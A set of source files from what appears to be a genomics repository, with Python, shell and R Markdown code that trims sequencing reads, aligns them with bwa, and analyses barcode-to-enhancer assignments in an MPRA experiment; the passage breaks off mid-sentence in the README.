"text": "from collections import Counter, defaultdict\nfrom argparse import ArgumentParser\nimport os\nimport pysam\nimport toolz as tz\nimport sys\n\n\nOUT_HEADER = [\"id\", \"ename\", \"barcode\", \"eid\", \"species\", \"subtype\", \"mismatch\",\n \"mapq\", \"as\", \"xs\", \"clipped\", \"insertions\", \"deletions\",\n \"matched\", \"other\", \"seq\"]\n\ndef open_samfile(in_file):\n if is_bam(in_file):\n return pysam.Samfile(in_file, \"rb\")\n elif is_sam(in_file):\n return pysam.Samfile(in_file, \"r\")\n else:\n raise IOError(\"in_file must be either a BAM file or SAM file. Is the \"\n \"extension .sam or .bam?\")\n\ndef is_bam(in_file):\n _, ext = os.path.splitext(in_file)\n if ext == \".bam\":\n return True\n else:\n return False\n\n\ndef is_sam(in_file):\n _, ext = os.path.splitext(in_file)\n if ext == \".sam\":\n return True\n else:\n return False\n\ndef parse_cigar_tuples(tuples):\n d = {\"insertions\": 0,\n \"deletions\": 0,\n \"clipped\": 0,\n \"matched\": 0,\n \"other\": 0}\n if not tuples:\n d[\"clipped\"] = \"NA\"\n d[\"insertions\"] = \"NA\"\n d[\"deletions\"] = \"NA\"\n d[\"matched\"] = \"NA\"\n d[\"other\"] = \"NA\"\n return d\n for t in tuples:\n if t[0] == 4 or t[0] == 5:\n d[\"clipped\"] += t[1]\n elif t[0] == 1:\n d[\"insertions\"] += t[1]\n elif t[0] == 2:\n d[\"deletions\"] += t[1]\n elif t[0] == 0:\n d[\"matched\"] += t[1]\n else:\n d[\"other\"] += t[1]\n return d\n\ndef is_clipped(read):\n cigar = parse_cigar_tuples(read.cigar)\n if cigar[\"clipped\"] > 0:\n return True\n else:\n return False\n\ndef get_insertions(read):\n cigar = read.cigar\n insertions = []\n index = 0\n for t in cigar:\n if t[0] == 1:\n for x in range(t[1]):\n insertions.append((\"I\", index, read.seq[index]))\n index += 1\n elif t[0] == 2:\n for x in range(t[1]):\n index -= 1\n else:\n index += t[1]\n return insertions\n\ndef get_variants(read):\n variants = []\n md = partition_md(read)\n index = 0\n for x in md:\n if x.isdigit():\n index += int(x)\n elif x.startswith(\"^\"):\n deleted = x[1:]\n for c in deleted:\n variants.append((\"D\", index, c))\n index += 1\n else:\n for c in x:\n variants.append((\"M\", index, c))\n index += 1\n insertions = get_insertions(read)\n variants += insertions\n return set(variants)\n\nis_digit = lambda x: x.isdigit()\n\ndef partition_md(read):\n try:\n md = read.opt(\"MD\")\n except KeyError:\n return None\n return [\"\".join(x) for x in tz.partitionby(is_digit, md)]\n\ndef diffs(read, mate):\n read_md = partition_md(read)\n mate_md = partition_md(mate)\n\ndef reconstruct_reference(read):\n index = 0\n ref = \"\"\n seq = read.seq\n partitions = partition_md(read)\n for p in partitions:\n if p.isdigit():\n ref = ref + seq[index:index + p]\n index = index + p\n\ndef get_errors(read, mate):\n read_var = get_variants(read)\n mate_var = get_variants(mate)\n all_var = read_var.union(mate_var)\n\n synthesis = read_var.intersection(mate_var)\n sequencing = all_var.difference(synthesis)\n return {\"sequencing\": sequencing, \"synthesis\": synthesis}\n\ndef bam_to_tab(in_file):\n out_file = os.path.splitext(in_file)[0] + \".tsv\"\n # if os.path.exists(out_file):\n # return out_file\n skipped_no_cigar = 0\n pairs_processed = 0\n skipped_no_mate = 0\n skipped_mismatch_position = 0\n skipped_clipped = 0\n skipped_unmapped = 0\n skipped_secondary = 0\n skipped_read_not_matched = 0\n synthesis_dict = defaultdict(Counter)\n sequencing_dict = defaultdict(Counter)\n seen = Counter()\n\n with open_samfile(in_file) as in_file, open(out_file, \"w\") as out_handle:\n print 
>>out_handle, \"\\t\".join(OUT_HEADER)\n for read in in_file:\n\n try:\n ename = in_file.getrname(read.tid)\n except:\n ename = \"unmapped\"\n if read.is_secondary:\n skipped_secondary += 1\n continue\n\n barcode, number = read.qname.split(\"-\")\n fragment_id = (barcode, ename)\n mapq = int(read.mapq)\n try:\n ename = in_file.getrname(read.tid)\n species = ename.split(\"_\")[1]\n subtype = ename.split(\"_\")[2]\n eid = ename.split(\"_\")[0].replace(\"-\", \"\")\n except ValueError:\n ename = \"unmapped\"\n species = \"NA\"\n subtype = \"NA\"\n eid = \"NA\"\n try:\n mismatch = read.opt(\"NM\")\n except KeyError:\n mismatch = 0\n try:\n AS = read.opt(\"AS\")\n except KeyError:\n AS = 0\n try:\n XS = read.opt(\"XS\")\n except KeyError:\n XS = 0\n cigar = parse_cigar_tuples(read.cigar)\n clipped = cigar[\"clipped\"]\n insertions = cigar[\"insertions\"]\n deletions = cigar[\"deletions\"]\n matched = cigar[\"matched\"]\n other = cigar[\"other\"]\n seq = str(read.seq)\n out_line = map(str, [number, ename, barcode, eid, species, subtype,\n mismatch, mapq, AS, XS, clipped, insertions,\n deletions, matched, other, seq])\n out_string = \"\\t\".join(out_line)\n print >>out_handle, out_string\n print >>sys.stdout, \"Total pairs processed: %d\" % pairs_processed\n print >>sys.stdout, \"Skipped due to having no mate: %d\" % skipped_no_mate\n print >>sys.stdout, \"Skipped due to mapping to different locations: %d\" % skipped_mismatch_position\n print >>sys.stdout, \"Skipped due to clipping of read: %d\" % skipped_clipped\n print >>sys.stdout, \"Skipped due to pair not matching: %d\" % skipped_read_not_matched\n print >>sys.stdout, \"Skipped the secondary alignment: %d\" % skipped_secondary\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"BAM\", help=\"BAMfile\")\n args = parser.parse_args()\n\n bam_to_tab(args.BAM)\n"
},
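bam_to_table.py splits the SAM MD tag into runs of digits (matched bases) and non-digit runs (mismatched bases and `^`-prefixed deletions) with toolz.partitionby. The same split can be sanity-checked without toolz using itertools.groupby; the MD string below is a made-up example.

```python
from itertools import groupby

def partition_md(md):
    # split an MD tag into digit runs (matches) and non-digit runs
    # (mismatched bases or ^-prefixed deletion runs)
    return ["".join(run) for _, run in groupby(md, key=str.isdigit)]

print(partition_md("10A5^AC6"))  # -> ['10', 'A', '5', '^AC', '6']
```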
{
"alpha_fraction": 0.6137834191322327,
"alphanum_fraction": 0.6295358538627625,
"avg_line_length": 36.03125,
"blob_id": "79b5b17f3d267c9497b4a0c165be43aa7d2e75f7",
"content_id": "36beb97d9b0c13bd21bd6074dc7786003c3a0134",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3555,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 96,
"path": "/code/clean_read.py",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "import re\nimport os\nfrom argparse import ArgumentParser\nfrom Bio import SeqIO, pairwise2\n\ndef file_exists(fname):\n \"\"\"Check if a file exists and is non-empty.\n \"\"\"\n try:\n return fname and os.path.exists(fname) and os.path.getsize(fname) > 0\n except OSError:\n return False\n\ndef find_sequence_index(seq, adapter, align=True):\n \"\"\"\n if the read is missing the adapter sequence, then drop it\n \"\"\"\n # first alignment is best alignment\n if align:\n alignment = pairwise2.align.localxs(adapter, seq, -1, -0.1)[0]\n adapter_idx = start_from_alignment(alignment, len(adapter))\n else:\n adapter_idx = [m.start() for m in re.finditer(adapter, str(seq))]\n\tif adapter_idx:\n\t adapter_idx = adapter_idx[0]\n if not adapter_idx:\n return None\n return adapter_idx\n\ndef start_from_alignment(alignment, adapter_length):\n if not alignment:\n return None\n # if the alignment is poor, skip it (there is a gap or two mismatches)\n # 14 = two mismatches or 1 gap with our parameters\n if alignment[2] < (adapter_length - 2):\n return None\n return alignment[3]\n\ndef partition_read1(seq, args):\n left_adapter_idx = find_sequence_index(seq, args.left_adapter, args.align)\n right_adapter_idx = find_sequence_index(seq, args.right_adapter, args.align)\n restriction_idx = find_sequence_index(seq, args.restriction, args.align)\n if not all([left_adapter_idx, right_adapter_idx, restriction_idx]):\n return None, None\n if restriction_idx < 16:\n return None, None\n barcode = seq[restriction_idx-16:restriction_idx]\n return barcode, (left_adapter_idx, right_adapter_idx + len(args.right_adapter))\n\ndef partition_reads(args):\n fastq_file_1 = args.fastq1\n base_1, ext_1 = os.path.splitext(fastq_file_1)\n read_number = 0\n in_handle_1 = SeqIO.parse(fastq_file_1, \"fastq-sanger\")\n enhancer_fq_1 = base_1 + \".enhancer\" + ext_1\n if file_exists(enhancer_fq_1):\n return enhancer_fq_1\n\n skipped_too_short = 0\n skipped_missing_constant_seqs = 0\n kept = 0\n\n with open(enhancer_fq_1, \"w\") as fq_handle_1:\n for read in in_handle_1:\n read_number += 1\n if read_number % 100 == 0:\n print \"Processed %d reads.\" % read_number\n if len(read) < 187:\n skipped_too_short += 1\n continue\n barcode, idx = partition_read1(read.seq, args)\n if not barcode or not idx:\n skipped_missing_constant_seqs += 1\n continue\n kept += 1\n read.id = \"{barcode}-{read_number}\".format(**locals())\n fq_handle_1.write(str(read[idx[0]:idx[1]].__format__(\"fastq-sanger\")))\n\n print \"Reads proccessed: %s.\" % read_number\n print \"Reads skipped for being too short: %s.\" % skipped_too_short\n print (\"Reads skipped for not matching the anchor sequences: \"\n \"%s.\" % skipped_missing_constant_seqs)\n print \"Reads kept: %s.\" % kept\n return enhancer_fq_1\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--align\", default=False, action=\"store_true\", \n help=\"turn on local alignment (very slow)\")\n parser.add_argument(\"fastq1\", help=\"Read 1 of lane to parse.\")\n parser.add_argument(\"--left-adapter\", default=\"TGAGGAGCCGCAGTG\")\n parser.add_argument(\"--right-adapter\", default=\"CAGTGAAGCGGCCAG\")\n parser.add_argument(\"--restriction\", default=\"TCTAGAGGTACC\")\n args = parser.parse_args()\n\n partition_reads(args)\n"
},
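clean_read.py locates the constant restriction site in each read and takes the 16 bases immediately upstream of it as the barcode. A toy reproduction of that indexing with str.find; the read below is synthetic, and only the restriction-site constant is copied from the script's defaults.

```python
RESTRICTION = "TCTAGAGGTACC"  # constant site, from clean_read.py's defaults

read = "GGGG" + "ACGTACGTACGTACGT" + RESTRICTION + "TTTT"  # synthetic read
idx = read.find(RESTRICTION)
if idx >= 16:  # need at least 16 bases upstream for the barcode
    barcode = read[idx - 16:idx]
    print(barcode)  # -> ACGTACGTACGTACGT
```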
{
"alpha_fraction": 0.5593220591545105,
"alphanum_fraction": 0.7389830350875854,
"avg_line_length": 48.16666793823242,
"blob_id": "4d709bab3bffcc90de31a6fa61db125668ad9b6e",
"content_id": "756486d851adeb9a2cdafcce8fc209ab1c0bd6c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 295,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 6,
"path": "/code/align.sh",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nif [ -e \"metadata/Array3_12k_2014_05_12_merged.fa.amb\" ] \n bwa index metadata/Array3_12k_2014_05_12_merged.fa\nfi\nmkdir align\nbwa bwasw metadata/Array3_12k_2014_05_12_merged.fa data/TN03_S1_L001_R1_001.enhancer.fastq | samtools view -Sbh - > align/TN03_S1_L001_R1_001.enhancer.bam\n"
},
{
"alpha_fraction": 0.723954439163208,
"alphanum_fraction": 0.7329701781272888,
"avg_line_length": 44.63428497314453,
"blob_id": "1f1cdc19a6290a91dd7249a812514fba468a3386",
"content_id": "d44df417a28ac1e4706805c29d63d46278a69a50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "RMarkdown",
"length_bytes": 15972,
"license_type": "no_license",
"max_line_length": 414,
"num_lines": 350,
"path": "/reports/analysis_fixed.Rmd",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "---\n html_document:\n toc: true\n highlight: zenburn\n theme: united\n---\n\n```{r setup, echo=FALSE}\nknitr::opts_chunk$set(tidy=TRUE, highlight=TRUE, dev=\"png\",\n cache=TRUE, highlight=TRUE, autodep=TRUE, warning=FALSE, error=FALSE,\n message=FALSE, prompt=TRUE, comment='', fig.cap='')\n```\n\n## Background information\nThis project is from Jesse\nGray's lab, they are interested in looking at the composition of the enhancer sequences they had synthesized and stuck into some viral vectors; there are several subsets of enhancers, some from mouse and human and the mouse enhancers have several positive and negative controls. The enhancer sequences we barcoded with a 16mer and they are interested in looking at what the barcode distribution looks like as well.\n\nMost of the enhancer sequences are ~ 140mers in a sliding window across ~ 600 full length enhancer\nsequences. We don't have the full sequences available yet but they are floating around\nsomewhere. There are about ~ 12k enhancer fragments that were synthesized.\n\nAs a first iteration, we did something super simple to get to this\npoint, we took the enhancer fragments and made a bwa database, then\naligned the reads to those. Before aligning the reads we stuck the\nbarcode for each read in the read name, so we could figure out which\nbarcode was associated with an alignment. Then we parsed the alignment\nfile to dump which enhancer sequence it aligned to, along with the\nbarcode that was used and some numbers about mapping quality and\nnumber of mismatches along with the sequence that was sequenced. The code to do all of this,\nand this report, is up on github [here](https://github.com/hbc/gray-enhancers).\n\n```{r read-data}\nrequire(ggplot2)\nlibrary(knitr)\nlibrary(plyr)\nlibrary(dplyr)\nin_file = \"../align/TN03_S1_L001_R1_001.tsv\"\ndat = read.table(in_file, header=TRUE, sep=\"\\t\")\n# remove the reads which did not align to an enhancer\ndat = tbl_df(dat[!is.na(dat$eid),])\ndat$differences = dat$mismatch + dat$insertions + dat$deletions + dat$clipped\nsequencing_depth = dat %>% group_by(barcode, eid) %>% summarise(count=n()) %>% ungroup()\n\nnreads = nrow(dat)\nunique_barcodes = unique(dat$barcode)\nnunique_barcodes = length(unique_barcodes)\nunique_reads = unique(dat[, c(\"barcode\", \"eid\")])\n```\n\nThe original FASTQ file has about 24 million reads in it, so that is\nthe starting point. Aligning those reads to the set of enhancer\nsequences generates `r nreads` total alignments, with\n`r nrow(unique_reads)` unique barcode-enhancer pairs represented in\nthose alignments which means many of the barcode-enhancer pairs have multiple\nalignments representing them. 
Of the `r nrow(unique_reads)` unique\nbarcode-enhancer pairs, there are\n`r length(unique(unique_reads$barcode))` unique barcodes represented,\nso some barcodes are doing double duty and either aligning to more\nthan one enhancer sequence or are attached to multiple enhancer\nsequences.\n\nPrevious work looking at random barcoding of sequences has shown that the barcodes with\nonly one read of evidence for them tend to be sequencing errors:\n\n\n\nIt looks like we can dump barcodes that only appear a small number of times, not just 1, and\nremove some more noise from the data.\n\n```{r depth-per-just-barcode}\ndetach(\"package:dplyr\")\nlibrary(dplyr)\ngrouped = dat %>% group_by(barcode) %>% summarise(count=n()) %>% ungroup()\nggplot(grouped, aes(count)) + geom_histogram() + scale_x_log10() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nWe start with `r nrow(grouped)` unique barcodes and\nwe dump those barcodes that appear less than four times as sequencing errors in the\nbarcode.\n\n```{r dump-likely-erroneous-barcodes}\ndat = dat %>% group_by(barcode) %>% filter(n() > 4) %>% ungroup()\ngrouped = dat %>% group_by(barcode) %>% summarise(count=n())\nggplot(grouped, aes(count)) + geom_histogram() + scale_x_log10() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nThis leaves us with `r nrow(dat)` total alignments to work with and `r nrow(grouped)` barcodes.\nIf we further restrict and now group by eid and barcode instead of just barcode,\nwe can identify another set of\nlikely-erroneous barcode + eid combinations to remove.\nThe idea behind this is that if a barcode + eid is really present in the sample, we should\nhave sequenced more than one read for it and generate more than one alignment for that barcode.\n\n```{r depth-per-eid-and-barcode}\nlikely_erroneous = dat %>% group_by(barcode, eid) %>% summarise(count=n())\nggplot(likely_erroneous, aes(count)) + geom_histogram() + scale_x_log10() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\n```{r depth-per-eid-and-barcode-filtered}\ndat = dat %>% group_by(barcode, eid) %>% filter(n() > 2)\nfiltered_depth = dat %>% group_by(barcode, eid) %>% summarise(count=n())\nggplot(filtered_depth, aes(count)) + geom_histogram() + scale_x_log10() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nThis leaves us with `r nrow(dat)` total alignments to work with and `r nrow(sequencing_depth)`\nunique barcodes + eid to work with. There are `r length(unique(dat$barcode))` unique barcodes\nand `r length(unique(dat$eid))` unique EIDs detected.\n\n\nAfter that initial cleaning, we have a table *dat* which is a set of\n`r nrow(dat)` alignments where we have removed alignments where we\nthought it was pretty likely the barcode was wrong due to a sequencing\nerror. Some of these alignments are seen repeatedly. 
Here we group alignments\nby barcode, eid, the number of differences, the mapping quality and the\nscore of the primary and secondary alignments to identify alignments that\nare identical.\n\n```{r identical-alignment-counts}\ncleaned = dat[, 2:ncol(dat)] %>% group_by(barcode, eid, differences, mapq, as, xs, seq) %>%\n    mutate(count = n()) %>% ungroup() %>% distinct()\nggplot(cleaned, aes(count)) + geom_histogram() + scale_x_log10() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nThis gets us down to `r nrow(cleaned)` distinct alignments. From the\nabove plot we can see there are many alignments that appear only a\nsmall number of times. These are again likely errors, but this time in\nthe enhancer sequence, not the barcodes.\n\nHere is an example from one barcode + eid combination:\n\n```{r example-enhancer-errors}\nx = subset(cleaned, barcode == \"TGGCTGGTGTTGTAGT\")\nx$count\nsubset(x[, c(\"barcode\", \"eid\", \"differences\", \"mismatch\", \"count\", \"as\", \"xs\")], count > 10)\n```\n\nWe can see the sequence identified by barcode \"TGGCTGGTGTTGTAGT\" likely\nhas 5 differences in the sequence to enhancer id 63406153. This is the best alignment,\nas the secondary alignment (xs) has a lower score than the primary alignment (as).\nThe other sequences we see tagged by this barcode are likely to be sequencing errors;\nthe next most common sequence we see has an extra mismatch to enhancer 63406153.\nWe have 234 reads of evidence that this sequence is present in the sample, so we can\nbe pretty sure these errors are likely synthesis errors.\n\nSo another useful filtering is to take only the barcode+eid that we have seen the most, and we\nwill call this the true sequence going forward.\n\n```{r best-set}\nclean = cleaned %>% group_by(barcode, eid, seq) %>% filter(count==max(count)) %>% ungroup()\n```\n\nNow we can break down what these look like.\n\n```{r clean-distribution}\nggplot(clean, aes(count)) + geom_histogram() + scale_x_log10() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nBefore, we were doing one final filtering, filtering out barcode+eid sequences where the\nmost common hit had < 10 counts. We think this hurt our sensitivity though; we were missing\nsome real sequences. 
Here we drop that filtering to < 3 counts to try to recover more\nof the enhancer sequences.\n\n```{r final-clean}\nclean = subset(clean, count >= 3)\nggplot(clean, aes(count)) + geom_histogram() + scale_x_log10() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\nexact = subset(clean, differences == 0)\n```\n\nThat leaves us with `r nrow(clean)` barcode + enhancer sequences to consider.\nThose are represented by `r length(unique(clean$barcode))` barcodes and\n`r length(unique(clean$eid))` enhancer ids.\n\n`r nrow(exact)` of the barcode + eid sequences are exact matches\nto the enhancer sequences, representing 6884 distinct enhancer sequences.\n\n\nEach enhancer sequence is represented by multiple barcodes:\n\n```{r reads-per-eid-plot}\nreads_per_eid = clean %>% group_by(eid) %>% summarise(count=n())\nggplot(reads_per_eid, aes(count)) + geom_histogram() + scale_x_log10() +\n    xlab(\"# of unique barcodes\") +\n    ylab(\"# of enhancers with this many unique barcodes\") +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nBelow is a plot in the other direction, the number of times each barcode is seen.\nMost barcodes are uniquely used and are seen only on a single enhancer once we\nremove the likely erroneous barcodes.\n\n```{r read-per-barcode-plot}\nreads_per_barcode = clean %>% group_by(barcode) %>% summarize(count=n())\nggplot(reads_per_barcode, aes(count)) + geom_histogram() + scale_x_sqrt() +\n    ylab(\"# of barcodes\") + xlab(\"# of different enhancers a barcode is seen on\") +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nSome enhancers had better mapping quality than others. It looks like it separates out\nby subtype.\n\n```{r mapq-plot}\nggplot(clean, aes(subtype, mapq)) + geom_boxplot() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") + xlab(\"\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nSimilarly, there is less of a spread of the differences to the best hit,\nthough the sliding and endogenous subtypes seem to have an enrichment for\na low number of mismatches.\n\n```{r mismatch-plot}\nggplot(clean, aes(subtype, differences)) + geom_violin() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") + scale_y_sqrt() +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\nIn general, mapping quality decreases with the number of differences with the enhancer sequence, but there is a range at each value.\n\n```{r mismatch-vs-mapq-plot}\nggplot(clean, aes(differences, mapq)) + geom_point() + facet_wrap(~ subtype) +\n    xlab(\"# of mismatches\") +\n    ylab(\"mapping quality\") +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"),\n          axis.ticks = element_blank(), axis.text.x = element_blank())\n```\n\n```{r as-vs-xs}\nggplot(clean, aes(as, xs)) + geom_point() + facet_wrap(~ subtype) +\n    xlab(\"score of best alignment\") +\n    ylab(\"score of second best alignment\") +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"),\n          axis.ticks = element_blank(), axis.text.x = element_blank())\n```\n\nSome enhancer sequences don't have a best hit. 
Here are the enhancer sequences that are missing:\n\n```{r missing-enhancers, results='asis'}\nenhancer_fn = \"../metadata/enhancer.tsv\"\nenhancers = read.table(enhancer_fn, header=TRUE, stringsAsFactors=FALSE)\nenhancers$seen = enhancers$eid %in% clean$eid\nnmissing = nrow(subset(enhancers, !seen))\nnseen = nrow(subset(enhancers, seen))\nout_table = data.frame(table(enhancers$seen))\ncolnames(out_table) = c(\"seen\", \"count\")\nkable(out_table, format=\"markdown\")\n```\n\nOut of `r nrow(enhancers)` enhancers, there are `r nmissing` missing and `r nseen` seen\nenhancers. Here is a breakdown by type:\n\n```{r enhancer-table, results='asis'}\nout_table = data.frame(table(enhancers[, c(\"subtype\", \"seen\", \"species\")]))\ncolnames(out_table) = c(\"subtype\", \"seen\", \"species\", \"count\")\nkable(out_table, format=\"markdown\")\nwrite.table(subset(enhancers, !seen), file=\"missing_enhancers.csv\", quote=FALSE, sep=\",\",\n            col.names=TRUE, row.names=FALSE)\n```\n\nFinally we write out the cleaned data to a big table. This table has, for each\nbarcode and enhancer sequence, the number of mismatches, indels, etc. for the alignment\nto the specified enhancer sequence. The alignment is the best hit for the sequence and\nthe mismatches are likely synthesis errors, because we saw them in at least 3 separate\nidentical reads. The consensus sequence that generated the best hit is in the seq\ncolumn of the table.\n\n```{r write-clean}\nwrite.table(clean, file=\"clean.csv\", quote=FALSE, sep=\",\", col.names=TRUE, row.names=FALSE)\n```\n\n## How did we do recovering the highly expressed barcodes?\nThese are cDNA counts from two replicates of two conditions, sequencing from plasmid\nDNA. I'm not too clear on where this data came from; is it a similar type of experiment?\n\n```{r read-bc-data}\nbc_file = \"../metadata/TN03/TN03_MiSeq_tallies_raw_bcs.tsv\"\ncdna_bc = read.table(bc_file, sep=\"\\t\", header=TRUE)\nrownames(cdna_bc) = cdna_bc$bc\nrownames(cdna_bc) = as.factor(rownames(cdna_bc))\ncdna_bc$bc = NULL\n```\n\nThis has `r nrow(cdna_bc)` barcodes; we are only picking up about 210k barcodes, so we\nare only getting about half of the data. A bunch of these barcodes have very low counts,\nonly appearing a small number of times in some conditions.\n\n```{r bc-data-plot}\nqplot(rowSums(cdna_bc)) + geom_histogram() +\n    theme_bw(base_size=12, base_family=\"Gill Sans\") + scale_x_log10() +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nThese might be errors; we can do something similar as we did above and drop barcodes that\nappear < 3 times.\n\n```{r subset-cdna-barcodes}\ncdna_bc = subset(cdna_bc, rowSums(cdna_bc) >=3)\nhigh_bc = subset(cdna_bc, rowSums(cdna_bc) >=100)\n```\n\nThat leaves us with `r nrow(cdna_bc)` barcodes and puts us closer to the `r nrow(clean)`\nbarcodes we recover from this experiment. In the original, non-cleaned dataset we\nare missing `r nrow(cdna_bc) - sum(rownames(cdna_bc) %in% dat$barcode)` out of\n`r nrow(cdna_bc)` barcodes.\nIf we restrict this to barcodes with total counts > 100 then we\nare missing `r nrow(high_bc) - sum(rownames(high_bc) %in% dat$barcode)` out of `r nrow(high_bc)`\nbarcodes.\n\nWhy are we missing these still? It depends on the barcode. For example TTTGCGTTCGTGCGTT is missing,\nbut only appears a small number of times in the reads, and most of the time it is a very short sequence. 
Only one read was long enough to have a real enhancer sequence in it.\n\nBarcode AAAACTATCGTTTGAG is highly expressed in the cDNA data and has many reads with that\nsequence in it. It has a lot of reads that all match the barcode, and both of the adapter sequences match. The enhancer sequence looks fine:\n\nGAGCCGTGGACTTCGGCGAAGCGACCACAACAACAACGGAGGCGGCGGCGGCAGCGACGACTACTCCACAGGCGGGACTTCCGGCTGCCGGAGCCTAGCAACCTCCCGGGGCGGGGCTTCCGGCGGGCCTGGTAAGAG\n\nThis barcode appears many times in the original TSV file:\n\n```{r missing-barcode}\nsubset(dat, barcode == \"AAAACTATCGTTTGAG\")\n```\n\nSo what is the deal, why are we missing it?\n\nThe enhancer sequence doesn't have a full length match to any\nparticular sequence. The GC content is high, 70%. There are a lot of\nsequencing errors in this enhancer sequence and there are only 32\nreads, and it just happens that none of them are repeated more than\ntwice; even though we know what enhancer the sequence is for, we don't have enough\nevidence to call the actual sequence the way we are doing it.\n\nTo rescue these types of reads, we'd have to do something like call a consensus sequence and\nthen realign. But since we are missing 4,000 barcodes right from the start, this would at most\nfix the 1.5k or so that are filtered out by the cleaning process.\n"
},
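The report above repeatedly applies one idea: group alignments by barcode (or barcode + enhancer) and drop groups below a support threshold as likely sequencing errors. The same step in plain Python with collections.Counter, assuming rows of (barcode, enhancer_id) pairs; the data and names are invented, and the cutoff of four mirrors the report.

```python
from collections import Counter

# toy alignment rows: (barcode, enhancer_id)
alignments = [("AAAA", "e1")] * 6 + [("CCCC", "e2")] * 2
counts = Counter(bc for bc, _ in alignments)
kept = [(bc, eid) for bc, eid in alignments if counts[bc] > 4]
print(sorted(set(kept)))  # CCCC is dropped as a likely sequencing error
```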
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.75,
"avg_line_length": 15,
"blob_id": "07ca168d7f161969e805d7b0eedce0c19e689a98",
"content_id": "1d155db89fba1f208e71f83cff8541ec560d2a20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 16,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/requirements.txt",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "biopython>=1.61\n"
},
{
"alpha_fraction": 0.7654458284378052,
"alphanum_fraction": 0.7787643074989319,
"avg_line_length": 38.173912048339844,
"blob_id": "e8f2e975f4eaaaf5c0b015407d74ec238fd575a7",
"content_id": "794f6ec270da61f98e73346c364d166485a60df4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2703,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 69,
"path": "/README.md",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "## assign barcodes to enhancers\nThese are the scripts to look at enhancer + barcode statistics from the MPRA\nexperiment.\n\nThese scripts take the tiled enhancer sequences and creates a BWA index of the\ntiles. Then they align the barcoded reads to the tiled sequences and determine\nwhich barcode corresponds to which tile by determining which tile the barcode\naligns best to. Barcodes can have errors, so these scripts also do some\nsimple disabiguation of erroneous barcodes. They also drop barcodes that are\nambiguous.\n\nThe clean_read.py part of these scripts is highly dependent on the structure of\nyour data. What this does is remove barcode and some other static sequences from\nthe read, and places the barcode in the read name. This is so after alignment,\nwe can figure out what barcode went with the sequence. If you can provide FASTQ\nfiles that have the barcode in the read name you can skip this step and run the\nrest of the analysis.\n\nYour reads should have the format `barcode-name` as the read name if you want\nto skip the cleaning step.\n\n## cleaning\nRaw reads are expected to have the format:\n```\n-11mer barcode +\n-12mer constant restriction site (TCTAGAGGTACC) +\n-88bp enhancer +\n-33bp constant seq (CAGTGAAGCGGCCAGTGATCGGAAGAGCACAC ) +\n-6bp Truseq index (GTCTGA or CGATGT) +\n-41bp P7 sequence (ACTCCAGTCACATCACGATCTCGTATGCCGTCTTCTGCTT)\n```\n\nBut if you can provide reads with names `barcode-name` you can skip this\nstep.\n\n\n## How to run\n1) Create a FASTA file of the enhancer sequences, enhancers.fa. The names of the\n sequences should not have any spaces in them.\n2) index the sequence with bwa: bwa index enhancers.fa\n3) stick barcode in the read name with: python ../code/clean_read.py sequences.fq\n3) align sequences with bwa mem: bwa mem -t number-of-threads enhancers.fa sequences.enhancers.fq > alignments.sam\n4) create a table of the barcode and best enhancer sequence alignment from the BAM file:\npython bam_to_table.py alignments.sam\n5) load into analysis_fixed.Rmd\n\n## example analysis\n```bash\ninfile=data/TN05_S1_L001_R1_001.fastq\ncleaned=data/TN05_S1.cleaned.fastq\nprefix=TN05\nout_dir=new-data\nenhancers=metadata/TN03_newstrategy_trimmed.fa\n\nmkdir -p out-dir\npython ../code/clean_read.py $infile > $cleaned\nbwa mem -t 6 $enhancers $cleaned > $out_dir/$prefix.sam\npython ../code/bam_to_table.py $out_dir/$prefix.sam\n```\n\nYou can use this table to do a more in depth analysis.\nThe file 